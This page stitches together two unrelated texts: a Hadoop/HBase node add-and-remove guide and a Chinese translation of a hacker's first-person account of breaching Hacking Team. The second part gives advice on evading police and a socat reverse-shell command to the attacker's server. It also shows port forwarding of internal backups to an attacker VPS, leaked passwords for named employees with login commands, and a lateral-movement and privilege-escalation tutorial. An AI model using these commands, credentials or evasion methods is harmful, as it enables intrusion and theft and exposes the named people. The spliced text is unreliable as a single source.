Hadoop热添加删除节点(含Hbase)

添加节点

1.修改host
和普通的datanode一样。添加namenode的ip
2.修改namenode的配置文件conf/slaves
添加新增节点的ip或host
3.在新节点的机器上,启动服务

[root@slave-004 hadoop]# ./bin/hadoop-daemon.sh start datanode
[root@slave-004 hadoop]# ./bin/hadoop-daemon.sh start tasktracker(hadoop1)
[root@slave-004 hadoop]# ./bin/yarn-daemon.sh start nodemanager(hadoop2)

4.均衡block

[root@slave-004 hadoop]# ./bin/start-balancer.sh

1)如果不balance,那么cluster会把新的数据都存放在新的node上,这样会降低mapred的工作效率
2)设置平衡阈值,默认是10%,值越低各节点越平衡,但消耗时间也更长

[root@slave-004 hadoop]# ./bin/start-balancer.sh -threshold 5

3)设置balance的带宽(hdfs-site),默认只有1M/s

 
   dfs.balance.bandwidthPerSec  
   1048576  
     
     Specifies the maximum amount of bandwidth that each datanode   
     can utilize for the balancing purpose in term of   
     the number of bytes per second.   
   

注意:
1. 必须确保slave的firewall已关闭;
2. 确保新的slave的ip已经添加到master及其他slaves的/etc/hosts中,反之也要将master及其他slave的ip添加到新的slave的/etc/hosts中
3.如果start-balancer.sh运行完了仍然没有反应的话,就把-threshold尽量调小,越小越均衡所耗时间也就越小

start-balancer.sh -threshold 1

Hbase

如果还有hbase在上面运行则需要部署hbase的hserver
5.在hbasemaster上修改regionservers
vim /home/hadoop/hbase/conf/regionservers
加入新节点
vim /home/hadoop/hbase/conf/hbase-site.xml
hbase.zookeeper.quorum属性加入新节点
6.复制上面两个文件到各个节点
7.在新节点上启动hbase regionserver
hbase-daemon.sh start regionserver
8.在hbasemaster启动hbase shell
用status命令确认一下集群情况

删除节点

1.集群配置
修改conf/hdfs-site.xml文件

   
   dfs.hosts.exclude  
   /data/soft/hadoop/conf/excludes  
   Names a file that contains a list of hosts that are   
   not permitted to connect to the namenode.  The full pathname of the   
   file must be specified.  If the value is empty, no hosts are   
   excluded.

编辑conf/mapred-site.xml文件,增加如下配置:
<property>
<name>mapred.hosts.exclude</name>
<value>/opt/hadoop_conf/exclude_node</value>
</property>

2确定要下架的机器
dfs.hosts.exclude定义的文件内容为,每个需要下线的机器,一行一个。这个将阻止他们去连接Namenode。如:

slave-003  
slave-004

  3.强制重新加载配置

[root@master hadoop]# ./bin/hadoop dfsadmin  -refreshNodes

它会在后台进行Block块的移动
4.关闭节点 
等待刚刚的操作结束后,需要下架的机器就可以安全的关闭了。

[root@master hadoop]# ./bin/ hadoop dfsadmin -report

可以查看到现在集群上连接的节点

正在执行Decommission,会显示: 
Decommission Status : Decommission in progress  

执行完毕后,会显示: 
Decommission Status : Decommissioned

5.再次编辑excludes文件
一旦完成了机器下架,它们就可以从excludes文件移除了
登录要下架的机器,会发现DataNode进程没有了,但是TaskTracker依然存在,需要手工处理一下

黑客讲述渗透Hacking Team全过程(详细解说)

1、序言

在这里,可能你会注意到相比于前面的一个版本,这个版本的内容及语言有了一些变化,因为这将是最后一个版本了[1]。对于黑客技术,英语世界中已经有了许多书籍,讲座,指南以及关于黑客攻击的知识。在那个世界,有许多黑客比我优秀,但他们埋没了他们的天赋,而为所谓的“防护”服务商(如Hacking Team之流的),情报机构服务工作。黑客文化作为一项非主流文化诞生于美国,但它现在只保留了它本质的魅力,其他均被同化了。从黑客的本质出发,至少他们可以穿着一件T恤,把头发染成蓝色,用自己的黑客的名字,随意洒脱地做着自己喜欢的事件,而当他们为别人(前文所指的Hacking Team及情报机构)工作的时候,会感觉自己像个反抗者。

如果按照传统的方式,你不得不潜入办公室偷偷拿到文件[2],或者你不得不持枪抢劫银行。但现在你仅仅需要一台笔记本,躺在床上动动手指便可做得这一切[3][4]。像CNT在入侵伽玛集团(Gamma Group)之后说的,“让我们以一种新的斗争方式向前迈进吧”[5]。

[1] http://pastebin.com/raw.php?i=cRYvK4jb

[2] https://en.wikipedia.org/wiki/Citizens%27_Commission_to_Investigate_the_FBI

[3] http://www.aljazeera.com/news/2015/09/algerian-hacker-hero-hoodlum-150921083914167.html

[4] https://securelist.com/files/2015/02/Carbanak_APT_eng.pdf

[5] http://madrid.cnt.es/noticia/consideraciones-sobre-el-ataque-informatico-a-gamma-group

2、Hacking Team

Hacking Team 是一家帮助政府针对新闻记者,激进分子,政府中的反对派以及其他的对政府可能造成的威胁因素进行入侵和监控的公司,详情可参考链接[1][2][3][4][5][6][7][8][9][10][11]。同样的,有时候也会针对违法犯罪和恐怖分子进行监控[12]。Vincenzetti为该家公司的CEO,而其邮件的最后签名往往带有法西斯口号“boia chi molla”(放弃者死)。一直以来,他宣称其拥有解决“Tor问题”以及“暗网问题”的技术[13]。但对此,我保持我的想法自由,我很怀疑其说的技术是否真的有效。

[1] http://www.animalpolitico.com/2015/07/el-gobierno-de-puebla-uso-el-software-de-hacking-team-para-espionaje-politico/

[2] http://www.prensa.com/politica/claves-entender-Hacking-Team-Panama_0_4251324994.html

[3] http://www.24-horas.mx/ecuador-espio-con-hacking-team-a-opositor-carlos-figueroa/

[4] https://citizenlab.org/2012/10/backdoors-are-forever-hacking-team-and-the-targeting-of-dissent/

[5] https://citizenlab.org/2014/02/hacking-team-targeting-ethiopian-journalists/

[6] https://citizenlab.org/2015/03/hacking-team-reloaded-us-based-ethiopian-journalists-targeted-spyware/

[7] http://focusecuador.net/2015/07/08/hacking-team-rodas-paez-tiban-torres-son-espiados-en-ecuador/

[8] http://www.pri.org/stories/2015-07-08/these-ethiopian-journalists-exile-hacking-team-revelations-are-personal

[9] https://theintercept.com/2015/07/07/leaked-documents-confirm-hacking-team-sells-spyware-repressive-countries/

[10] http://www.wired.com/2013/06/spy-tool-sold-to-governments/

[11] http://www.theregister.co.uk/2015/07/13/hacking_team_vietnam_apt/

[12] http://www.ilmessaggero.it/primopiano/cronaca/yara_bossetti_hacking_team-1588888.html

[13] http://motherboard.vice.com/en_ca/read/hacking-team-founder-hey-fbi-we-can-help-you-crack-the-dark-web

3、小心那里!

不幸的是,我们的世界凌乱不堪。有人可以通过做坏事来变得更加富裕,而有人却因做好事而遭受囚禁。幸运的是,感谢为了”Tor项目“付出努力的人们,你可以通过以下方式来隐匿自己,

(1)加密你的硬盘

我认为别等到警察来扣留你的电脑时,才悔之晚矣,俗话说,一分预防胜过十分治疗。

(2)使用虚拟机,并通过Tor来传输你的流量,这可以达到两个目的,第一,你的所有连接通过Tor可进行匿名。第二,保证你的个人生活和匿名生活(也可以说是,现实生活和网络生活)分开在不同的电脑上,这将帮助你避免有时候会将两者混淆在一起。你还可以通过匿名操作系统Whonix,[3], Tails [4], Qubes TorVM [5]或者其他定制化的工具来保护自己[6]。你可以在对应的编号链接找到比较详细的描述[7]。

(3)不要直接连接到Tor网络(视情况而定)

Tor并不是万灵药。在你连接上Tor以及实施你的黑客行动时,这两者之间的时间点是可能会被关联的。当然,也存在使用Tor 出口节点 [8] 的攻击,或者你可以使用别人的wifi连接到网络。而Wifislax [9] 是一个具备许多获取wifi工具的发行版linux。另外一个选择是,在连接到Tor之前,先连接到VPN或是桥节点[10],但这可能不安全,因为这可以使得黑客的行动与住所的网络行为发生关联,(这也是Jeremy Hammond杰瑞米·哈蒙德 被指控的原因(作为指控证据[11])。实际情况是,尽管Tor是不完美的,但它仍可以很好地支持我们的工作。当我在年轻鲁莽的时候,在除了使用Tor,而没有其他任何保护措施的情况下,我做了很多事情(这里我说的是黑客攻击),而警方却一直无法进行有效调查,直到现在我并没有出现任何问题。

[1] https://www.torproject.org/

[2] https://info.securityinabox.org/es/chapter-4

[3] https://www.whonix.org/

[4] https://tails.boum.org/

[5] https://www.qubes-os.org/doc/privacy/torvm/

[6] https://trac.torproject.org/projects/tor/wiki/doc/TransparentProxy

[7] https://www.whonix.org/wiki/Comparison_with_Others

[8] https://blog.torproject.org/blog/tor-security-advisory-relay-early-traffic-confirmation-attack/

[9] http://www.wifislax.com/

[10] https://www.torproject.org/docs/bridges.html.en

[11] http://www.documentcloud.org/documents/1342115-timeline-correlation-jeremy-hammond-and-anarchaos.html

3.1、基础设施

如果要进行攻击,我不会直接从Tor出口节点实施攻击。因为这些Tor出口节点都在黑名单上,速度很慢,并且不能获得反向连接。Tor只是用来进行匿名,我会连接到用以实施攻击的基础设施,其中包括,

(1)域名

可对C&C服务器进行导向,并为安全撤出设置好DNS隧道。

(2)稳定的服务器

作为C&C服务器接收反弹shells,同时作为一个发动攻击和存储获得各类数据的地方。

(3)攻击服务器

进行端口扫描,例如,扫描整个网络,或者通过SQL注入下载一个数据库等。

3.2、责任

在新闻上,我们经常看到攻击政府的黑客组织(“一般通过实施APTs”),因为他们总是使用同样的工具,留下同样的特征,甚至使用同样的基础设施(域名,邮件等等)。因为他们可以发动任意攻击而不用负任何法律责任,所以往往不会注意这一点。

我并不想让执法者太容易追溯到我对Hacking Team做了什么。作为一名黑帽黑客夜以继日的工作,使用了新的服务器以及域名,注册了新的邮箱,以及通过新的比特币进行交易。在入侵的过程中只使用了那些公开发布的工具,以及为了此次攻击专门编写的工具。而至此,我改变以往的做事风格,为的就是不留下我的特征标记。

4、信息收集

虽然它可能是乏味的,这一步是非常重要的,因为攻击面越大,就越容易找到其中的弱点。

4.1、技术信息

所需的工具和技术:

(1) Google

从一次精心构造的搜索查询中,你可以获得意想不到的东西。比如,DPR身份信息[1]。”Google Hacking for  Penetration Testers” [2]可作为参考,这是进行google hacking的圣经。

(2)子域名列举

一个企业主要的域名通常为第三方机构所提供,你将会发现属于域名像mx.company.com, ns1.company.com等等诸如此类的IP地址段。而有时这些子域名会“隐藏”起来,并不会暴露在网络之上。可利用工具像 fierce[3], theHarvester [4], and recon-ng [5]来枚举子域名.

(3)Whois查询与反向查询

通过使用域名whois查询信息或者企业的IP范围进行反向查询,你可以找到属于企业的其他域名和IP范围。据我所知,目前来说除了通过 google hack ,尚还没有存在免费的反向whois查询,google hack如:

“via della moscova 13” site:www.findip-address.com

“via della moscova 13” site:domaintools.com

(4)端口扫描与指纹识别

除了其他技术,你还可以通过和该企业的员工进行交谈,从中获取信息。我把它归属在这部分中是因为这种并不是一种攻击,仅仅只是一种收集信息的方法。另一方面则是进行端口扫描,虽然企业的IDS(入侵防御系统)会进检测到端口扫描事件,但是不用担心,因为IDS本身的误报很多,都是来自其内部的告警信息,所以你的端口扫描会被淹没在大量的误报中。

对于扫描,使用nmap是最为适合的,可识别它发现的大部分服务。因为企业包含了一大片IP地址段,考虑到效率,zmap[7] 和 masscan [8] 在效率上是较为快速的,WhatWeb [9] 以及BlindElephant [10]则能通过指纹匹配网站。

[1] http://www.nytimes.com/2015/12/27/business/dealbook/the-unsung-tax-agent-who-put-a-face-on-the-silk-road.html

[2] http://web.archive.org/web/20140610083726/http://www.soulblack.com.ar/repo/papers/hackeando_con_google.pdf

[3] http://ha.ckers.org/fierce/

[4] https://github.com/laramies/theHarvester

[5] https://bitbucket.org/LaNMaSteR53/recon-ng

[6] https://nmap.org/

[7] https://zmap.io/

[8] https://github.com/robertdavidgraham/masscan

[9] http://www.morningstarsecurity.com/research/whatweb

[10] http://blindelephant.sourceforge.net/

4.2、社会信息

对于社会工程,收集关于员工,岗位角色,通讯方式,操作系统,插件,软件等信息是非常有用的。

(1)Google

仍然是最有用的工具。

(2)theHarvester及recon-ng工具

这两个工具已经在上一部分提到了,但其实这两个工具还是有更多的功能。你可以通过它快速、自动地搜索到许多信息,它们的操作手册也都值得一读。

(3)LinkedIn

你可以在这里找到许多员工信息,企业的招聘人员是最能够与之进行“交流”的人。

(4) Data.com数据网站

如jigsaw,他们有着大量的员工信息。

(5)文件元数据

你可以找到许多员工和相关系统信息在企业对外发布的文件中。针对企业网站上的文件进行查找以及提取其中的元数据,其中较为有用的工具为metagoofil [1] and FOCA [2]。

[1] https://github.com/laramies/metagoofil

[2] https://www.elevenpaths.com/es/labstools/foca2/index.html

5、进入内网

这里会有多种途径进入到内网。由于针对Hacking Team所使用的方法不是很常用,而且会比普通的方法更麻烦。我建议先尝试接下来我提到的常见方法。

5.1、社会工程

社会工程,特别是鱼叉式网络钓鱼,近期也大多数攻击事件都与这种方式有关。请参照西班牙语的一个介绍,见[ 1 ]。而对于以英语发布的更多的信息,见[ 2 ](第三部分,“有针对性的攻击”)。有关社会工程在过去的有趣的轶事,见[ 3 ]。我不想尝试针对Hacking Team的钓鱼攻击,因为他们本身的一部分业务就是帮助政府对其反对派进行钓鱼。所以这其中会有很大的风险被Hacking Team识别到,从而打草惊蛇。

[1] http://www.hacknbytes.com/2016/01/apt-pentest-con-empire.html

[2] http://blog.cobaltstrike.com/2015/09/30/advanced-threat-tactics-course-and-notes/

[3] http://www.netcomunity.com/lestertheteacher/doc/ingsocial1.pdf

5.2、购买权限

感谢勤劳的俄罗斯人和他们的漏洞利用工具包,以及僵尸网络。我们也都知道,许多公司的网络中都会有一些漏洞的机器。而几乎所有的财富榜上Top500的企业,都有一个庞大的网络,且都会有一些僵尸机器在里面。相比而言,Hacking Team只是一家比较小的公司,而大部分员工都是信息安全领域的专家,所以内部网络出现漏洞的可能性比较小。

5.3、技术利用

在伽马集团被入侵之后,我在搜索漏洞过程中发现一个进程。而据检测,Hacking Team有以下的公网IP地址范围,

inetnum:        93.62.139.32 93.62.139.47

descr:          HT public subnet

但Hacking Team还是与公共网络有一些接轨。不像伽马集团,Hacking Team面向公网的站点需要客户端的认证才得以通过。而根据我前期的了解,其中包含了一个主要站点(一个Joomla blog,而就扫描工具Joomscan的扫描结果来看,并没有发现什么漏洞),一个邮件服务器,两个路由器,两个VPN系统以及一个垃圾邮件过滤系统。所以,现在有三个选择:尝试找到一个Joomla的0day,或者是postfix邮件系统上的0day,要不就是嵌入式系统上的0day。所以,到了这里,挖掘一个在嵌入式系统上的0day相对来说应该较为容易了。在经过两个星期的逆向工作后,我发现了一个远程代码执行漏洞。由于该漏洞尚未修补,所以理论上接下来是可以进行利用的。但在这里就不涉及到更多的细节。有关如何搜索该类型的漏洞的方法,可参见[3]以及[4]。

[1] http://pastebin.com/raw.php?i=cRYvK4jb

[2] http://sourceforge.net/projects/joomscan/

[3] http://www.devttys0.com/

[4] https://docs.google.com/presentation/d/1-mtBSka1ktdh8RHxo2Ft0oNNlIp7WmDA2z9zzHpon8A

6、准备工作

在针对Hacking Team使用这个exp之前,我做了很多的准备跟测试。我编写了一个带有后门的固件,以及针对嵌入式系统编写了多个post-exploitation工具。后门程序的作用在于保护exploit。

以下为我准备的post-exploitation工具:

(1)BusyBox

BusyBox 是一个集成了一百多个最常用linux命令和工具的软件。BusyBox 包含了一些简单的工具,例如ls、cat和echo等等,还包含了一些更大、更复杂的工具,例grep、find、mount以及telnet。它集成压缩了 Linux 的许多工具和命令,也包含了 Android 系统的自带的shell。

(2)nmap

扫描及指纹识别Hacking Team的内部网络。

(3)Responder.py

内网中间人攻击脚本,攻击Windows最有用的工具,无需用户账号,便可访问内部网络的权限。

(4)younghon

为了执行Responder.py

(5)tcpdump

嗅探流量

(6)dsniff

针对有漏洞协议(如FTP协议)进行密码嗅探,和ARP欺骗攻击。但我更想使用ettercap(由Hacking Team的ALoR和NaGA编写的),但很难编译进系统。

(7)socat

一个有用的pty shell:

my_server: socat file:`tty`,raw,echo=0 tcp-listen:my_port
   hacked box: socat exec:'bash -li',pty,stderr,setsid,sigint,sane \
		  tcp:my_server:my_port

该工具是属于网络类瑞士军刀,也可以说是一个netcat的同类型产品。socat的特点就是在两个流之间建立一个双向的通道。socat的地址类型很多,有ip, tcp, udp, ipv6, pipe,exec,system,open,proxy,openssl等等。

(8)screen

类似socat的pty脚本,其实也并不是必要工具,但这会让我在Hacking Team的网络里面如身处家中一样。这是一个SSH远程会话管理工具。

(9)一个SOCKS5代理服务器

与代理工具proxychains一起使用,用于访问内网。

(10)tgcd

用来进行端口转发,穿透防火墙。

[1] https://www.busybox.net/

[2] https://nmap.org/

[3] https://github.com/SpiderLabs/Responder

[4] https://github.com/bendmorris/static-python

[5] http://www.tcpdump.org/

[6] http://www.monkey.org/~dugsong/dsniff/

[7] http://www.dest-unreach.org/socat/

[8] https://www.gnu.org/software/screen/

[9] http://average-coder.blogspot.com/2011/09/simple-socks5-server-in-c.html

[10] http://tgcd.sourceforge.net/

在进行攻击之前,需要先设想下可能会出现的情况。那么我能预见的可能发生的最坏事情是,我的后门或post-exploit工具将使系统不稳定,从而引起内部人员注意并展开调查。因此,在其他易受攻击的同类企业网络环境中,我花了一周的时间测试我的漏洞,后门,和 post-exploit工具,然后才开始进入 Hacking Team 网络。

7、查看及监听

通过此前发现的漏洞及工具,现在我已经身处于内网中了,我想四处查看下以及需要思考下一步做什么。切换Responder.py脚本到分析模式(-A,仅监听,不发送回复数据包),及通过nmap进行低频,缓慢地扫描。

8、NoSQL 数据库

数据库为NoSQL,或者说是无需验证,这对于黑客来说是一个很棒的礼物。正当我担心MySQL的所有漏洞可能被修复时[2][3][4][5]。以下新的数据库出现了,发现其设计存在验证漏洞。而通过Nmap,也发现了在Hacking Team内网中的一些数据库。

27017/tcp open  mongodb       MongoDB 2.6.5

| mongodb-databases:

|   ok = 1

|   totalSizeMb = 47547

|   totalSize = 49856643072

|_    version = 2.6.5

27017/tcp open  mongodb       MongoDB 2.6.5

| mongodb-databases:

|   ok = 1

|   totalSizeMb = 31987

|   totalSize = 33540800512

|   databases

|_    version = 2.6.5

看起来这些是Hacking Team监控系统RCS所使用的测试实例。而由RCS监听的音频会以GridFS方式存储在MongoDB中。这就是在下面链接[6]中,音频文件夹的来源,看来他们自己也监控着自己。

[1] https://www.shodan.io/search?query=product%3Amongodb

[2] https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-20122122-a-tragically-comedic-security-flaw-in-mysql

[3] http://archives.neohapsis.com/archives/vulnwatch/2004-q3/0001.html

[4] http://downloads.securityfocus.com/vulnerabilities/exploits/hoagie_mysql.c

[5] http://archives.neohapsis.com/archives/bugtraq/200002/0053.html

[6] https://ht.transparencytoolkit.org/audio/

9、跨越网段

其中比较有趣的是,其监控及抓取到的是Hacking Team正在开发恶意程序的网络摄像头画面,但是这些信息对于下一步计划来说并不是很有用。而其中不安全的备份正是我们可以利用的漏洞。根据以下文档[1],他们的iSCSI系统应该是部署在一个隔离的网络中,但是nmap可以扫描到其在192.168.1.200/24子网中的部分地址,

3260/tcp open  iscsi?

| iscsi-info:

|   Target: iqn.2000-01.com.synology:ht-synology.name

|     Address: 192.168.200.66:3260,0

|_    Authentication: No authentication required

Nmap scan report for synology-backup.hackingteam.local (192.168.200.72)

...

3260/tcp open  iscsi?

| iscsi-info:

|   Target: iqn.2000-01.com.synology:synology-backup.name

|     Address: 10.0.1.72:3260,0

|     Address: 192.168.200.72:3260,0

|_    Authentication: No authentication required

因iSCSI系统需要关联一个内核模块,所以要将其编译为嵌入式系统中存在一定难度。随后,我通过端口转换,将其挂载到一个VPS(虚拟专用服务器),

VPS: tgcd -L -p 3260 -q 42838

Sistema embebida: tgcd -C -s 192.168.200.72:3260 -c VPS_IP:42838

VPS: iscsiadm -m discovery -t sendtargets -p 127.0.0.1

iSCSI ,现在发现了 iqn.2000-01.com.synology的名字,但在将其挂载之前尚存在一些问题,因为它现在识别它的地址为192.168.200.72 以及 127.0.0.1。

为解决这个问题,执行以下操作,

iptables -t nat -A OUTPUT -d 192.168.200.72 -j DNAT --to-destination 127.0.0.1

接着执行,

scsiadm -m node --targetname=iqn.2000-01.com.synology:synology-backup.name -p 192.168.200.72 --login

最后我们成功将其挂载上了。

vmfs-fuse -o ro /dev/sdb1 /mnt/tmp

接着发现多个虚拟机的备份文件。Exchange邮件服务器让我最感兴趣。但它容量太大了,下载不了,但我们仍然可以远程将其挂载,并搜索有趣的记录。

$ losetup /dev/loop0 Exchange.hackingteam.com-flat.vmdk
$ fdisk -l /dev/loop0
/dev/loop0p1            2048  1258287103   629142528    7  HPFS/NTFS/exFAT

so the offset is 2048 * 512 = 1048576
$ losetup -o 1048576 /dev/loop1 /dev/loop0
$ mount -o ro /dev/loop1 /mnt/exchange/

于文件目录,

/mnt/exchange/WindowsImageBackup/EXCHANGE/Backup 2014-10-14 172311

我们发现虚拟机的硬盘驱动器,将之挂载,

dfuse -r -t VHD -f f0f78089-d28a-11e2-a92c-005056996a44.vhd /mnt/vhd-disk/

mount -o loop /mnt/vhd-disk/Partition1 /mnt/part1

最后我们现在已经接触到了核心的内容了,我们能够查看旧的Exchange邮件服务器的所有文件了。

[1] https://ht.transparencytoolkit.org/FileServer/FileServer/Hackingteam/InfrastrutturaIT/Rete/infrastruttura%20ht.pdf

10、从安全备份到域管理

在安全备份中我最感兴趣的是,想尝试找到一个我可以用来访问实际服务器的密码或Hash。我用pwdump,cachedump,和lsadump [ 1 ]与注册表的备份来进行查找。而最后通过lsdadump发现了besadmin服务帐户(属于黑莓企业服务器)的密码:

_SC_BlackBerry MDS Connection Service

0000   16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    …………….

0010   62 00 65 00 73 00 33 00 32 00 36 00 37 00 38 00    b.e.s.3.2.6.7.8.

0020   21 00 21 00 21 00 00 00 00 00 00 00 00 00 00 00    !.!.!………..

接下来我在嵌入式系统中使用了proxychains代理工具以及smbclient去检测密码,

proxychains smbclient '//192.168.100.51/c$' -U 'hackingteam.local/besadmin%bes32678!!!'

获取到密码了!besadmin的密码仍然可用,且是个本地的admin账户。接下来,我用着我的代理和metasploit’s psexec_psh模块获取到一个meterpreter session。接下转向一个64位的进程,”load kiwi [5]和”creds_wdigest”,以下为获取到的一些密码信息,

HACKINGTEAM  BESAdmin       bes32678!!!

HACKINGTEAM  Administrator  uu8dd8ndd12!

HACKINGTEAM  c.pozzi        P4ssword      <—- look! the sysadmin!

HACKINGTEAM  m.romeo        ioLK/(90

HACKINGTEAM  l.guerra       [email protected]=.=

HACKINGTEAM  d.martinez     W4tudul3sp

HACKINGTEAM  g.russo        GCBr0s0705!

HACKINGTEAM  a.scarafile    Cd4432996111

HACKINGTEAM  r.viscardi     Ht2015!

HACKINGTEAM  a.mino         A!e$$andra

HACKINGTEAM  m.bettini      Ettore&Bella0314

HACKINGTEAM  m.luppi        Blackou7

HACKINGTEAM  s.gallucci     1S9i8m4o!

HACKINGTEAM  d.milan        set!dob66

HACKINGTEAM  w.furlan       Blu3.B3rry!

HACKINGTEAM  d.romualdi     [email protected]#

HACKINGTEAM  l.invernizzi   L0r3nz0123!

HACKINGTEAM  e.ciceri       2O2571&2E

HACKINGTEAM  e.rabe         [email protected]!

[1] https://github.com/Neohapsis/creddump7

[2] http://proxychains.sourceforge.net/

[3] https://www.samba.org/

[4] http://ns2.elhacker.net/timofonica/manuales/Manual_de_Metasploit_Unleashed.pdf

[5] https://github.com/gentilkiwi/mimikatz

11、下载邮件

现在我已经有了域管理员的权限,并且已经可以访问到公司的核心信息——邮件。因为我每使用一个密码都会增加被检测到的风险,那我就在对其进行浏览之前,先把邮件下载下来。而Powershell使得这一过程变得更加简单。在获取到邮件之后,等了几个星期才获取到源代码以及其他东西。之后又进入一次去下载新的邮件。因为服务器是意大利的,所以日期格式为日/月/年,我通过使用以下操作来进行:

-ContentFilter {(Received -ge '05/06/2015') -or (Sent -ge '05/06/2015')}

通过新的MailboxExportRequest,又下载了新的邮件(在这种情况下,所有的邮件皆是6月5日之前的。)问题在于如果日期大于12(这是因为在美国通常将将月份放在第一位,而月份通常又不能大于12),那么会返回的日期将不可用。看来微软公司的工程师只按照他们自己地区的配置习惯测试了软件。

[1] http://www.stevieg.org/2010/07/using-the-exchange-2010-sp1-mailbox-export-features-for-mass-exports-to-pst/

12、下载文件

现在我拥有域管理员的权限,我通过代理和smbclient的-Tc选项,开始下载共享出来的文件,比如,

proxychains smbclient ‘//192.168.1.230/FAE DiskStation’ \

-U ‘HACKINGTEAM/Administrator%uu8dd8ndd12!’ -Tc FAE_DiskStation.tar ‘*’

13、Windows域管理简介

在这里我想中断下,来分享一些关于攻击Windows 网络的内容。

13.1最新的时间

我将快速复述一下关于在Windows网络中的传播技术。远程执行技术要求需要一个本地的管理员密码或者hash才能开始进行。通常来说,获取这些登录口令的最常见的方式是使用 mimikatz [1],以及上述所提到的sekurlsa::logonpasswords模块,sekurlsa::msv模块,在之后,应该就能以管理员权限访问机器了。而最重要的提权工具是PowerUp [2]以及bypassuac [3]。

[1] https://adsecurity.org/?page_id=1821

[2] https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp

[3] https://github.com/PowerShellEmpire/Empire/blob/master/data/module_source/privesc/Invoke-BypassUAC.ps1

远程指南:

(1)psexec

Windows网络工具,你可以使用 psexec [1], winexe [2]以及metasploit的psexec_psh模块,powershell empire的invoke_psexec [4]或者是Windows命令”sc” [5]。对于metasploit模块,powershell empire,pth-winexe [6],获取hash便已足够,无需密码了。这是最为普遍的方法(需要打开445端口),但这种做法也是最不谨慎的。从我的经验来看,这种方法在攻击过程中从来不会被发现,但是在之后或许调查人员会找到其中的蛛丝马迹,从而推测出黑客的攻击路径。

(2)WMI

最谨慎的方法。WMI服务能够在所有的计算机上启用,除了服务器,因为防火墙会默认将其阻断。你可以使用wmiexec.py [7],pth-wmis [6](同样,你可以找到wmiexec 以及pth-wmis的demo进行参考,请参照[8])。powershell empires的invoke_wmi模块或者是Windows命令,wmic[5]。除了wmic之外,剩下的就要求需要hash了。

(3)PSRemoting [10]

这个功能默认是禁用的,我不建议在网络环境中使用新的协议。但是如果是管理员启用了该功能,那么对于我们来说是非常方便的,特别是可以使用powershell来做几乎任何事情。虽然这种方法在powershell 5 和 Windows 10中有所改变,但powershell现在仍然可以很容易的做很多事情,比如规避防病毒检测以及防止留下更多的指纹。

(4)程序任务

你可以通过 at 和 schtasks[5]远程执行这个程序。它们工作机制与psexec相同,同时也会留下一些已知的指纹。

(5)GPO

如果所有的协议都被禁用或者被防火墙阻断,但是如果你是域管理员,你可以使用GPO给它一个登录脚本,接着安装msi,并执行一个程序任务[13],或者就像我们看到Mauro Romeo(Hacking Team的系统管理员)的电脑上操作一样,通过GPO来启用WMI以及关闭防火墙过滤。

[1] https://technet.microsoft.com/en-us/sysinternals/psexec.aspx

[2] https://sourceforge.net/projects/winexe/

[3] https://www.rapid7.com/db/modules/exploit/windows/smb/psexec_psh

[4] http://www.powershellempire.com/?page_id=523

[5] http://blog.cobaltstrike.com/2014/04/30/lateral-movement-with-high-latency-

cc/

[6] https://github.com/byt3bl33d3r/pth-toolkit

[7] https://github.com/CoreSecurity/impacket/blob/master/examples/wmiexec.py

[8] https://www.trustedsec.com/june2015/no_psexec_needed/

[9] http://www.powershellempire.com/?page_id=124

[10] http://www.maquinasvirtuales.eu/ejecucion-remota-con-powershell/

[11] https://adsecurity.org/?p=2277

[12] https://www.secureworks.com/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems

[13] https://github.com/PowerShellEmpire/Empire/blob/master/lib/modules/lateral_movement/new_gpo_immediate_task.py

本地指南:

(1)伪造token

一旦你能以管理员权限访问到一台计算机,你也可以使用其他用户的token去访问域管理上的资源。可实现该功能的两个推荐工具是 incognito [1]以及mimikatz[2]中的“token::*”命令。

(2)MS14-068

你可以利用一个在Kerberos协议上可用的漏洞,生成一个域管理员凭证。

(3)通过hash

如果你拥有一个用户,但该用户并无一个可用的会话,你可以使用sekurlsa:pth [2]去获取一个用户凭证。

(4)进程注入

任何的RAT能够被注入到另外一个进程中-在meterpreter 和 pupy中的 [6] migrate命令,比如,或者powershell empire中的psinject [7]。你可以通过上述工具或者命令注入到有你需要的token的进程中。

(5)runas

runas是允许用户用其他权限运行指定的工具和程序,而不是用户当前登录提供的权限,有时候会比较有用,该命令属于Windows的一部分,在使用过程中如果你没有对应的图形界面,你也可以使用powershell[8]。

[1] https://www.indetectables.net/viewtopic.php?p=211165

[2] https://adsecurity.org/?page_id=1821

[3] https://github.com/bidord/pykek

[4] https://adsecurity.org/?p=676

[5] http://www.hackplayers.com/2014/12/CVE-20146324-como-validarse-con-cualquier-usuario-como-admin.html

[6] https://github.com/n1nj4sec/pupy

[7] http://www.powershellempire.com/?page_id=273

[8] https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-Runas.ps1

13.2、维持权限

如果你获取了访问权限,接下来是想维持它。而持续进行对于我们来说是一个挑战。当你渗透企业时,一般是不需要维持权限的,因为企业一般不会关闭机器。对于权限维持的更多信息,可以参照 [2][3][4]。但是渗透企业时,你根本不需要它,这只会增加被检测到的风险。

[1] http://blog.cobaltstrike.com/2014/05/14/meterpreter-kiwi-extension-golden-ticket-howto/

[2] http://www.harmj0y.net/blog/empire/nothing-lasts-forever-persistence-with-empire/

[3] http://www.hexacorn.com/blog/category/autostart-persistence/

[4] https://blog.netspi.com/tag/persistence/

13.3、内部侦查

这些天使用探测Windows网络的最好工具是Powerview [1].该工具的使用值得一读[2],[3], [4], [5], [6]。

Powershell在这里同样也是一个强大的工具。但是因为还是有很多服务器版本为2003及2000版的(这些版本并没有powershell功能),所以还是需要看回传统的途径方式,如使用netview.exe [9]工具或者windows的”new view”命令。其他的技术我是建议如下:

(1)下载文件列表

在域管理账户的权限下,你可以通过powerview下载网络中所有的文件列表,

Inqvoke-ShareFinderThreaded -ExcludedShares IPC$,PRINT$,ADMIN$ |

selectstring ‘^(.*) \t-‘ | %{dir -recurse $_.Matches[0].Groups[1]

| select fullname | outfile -append files.txt}

(2)阅读邮件

如上所说的,现在我们可以通过powershell来下载邮件,从而获取有用的信息。

(3)读取sharepoint平台信息

同样的,sharepoint平台亦是一个企业重要的管理系统,你也是可以使用powershell [10]下载相关信息。

(4)活动目录[11]

其中存在大量有用的信息,像用户和计算机等信息。无需获取域管理员账号,你也是可以通过powerview以及其他工具[12]来获取。在成为域管理员之后,你可以通过使用csvde或其他工具,从AD域中导出信息。

(5)监控员工

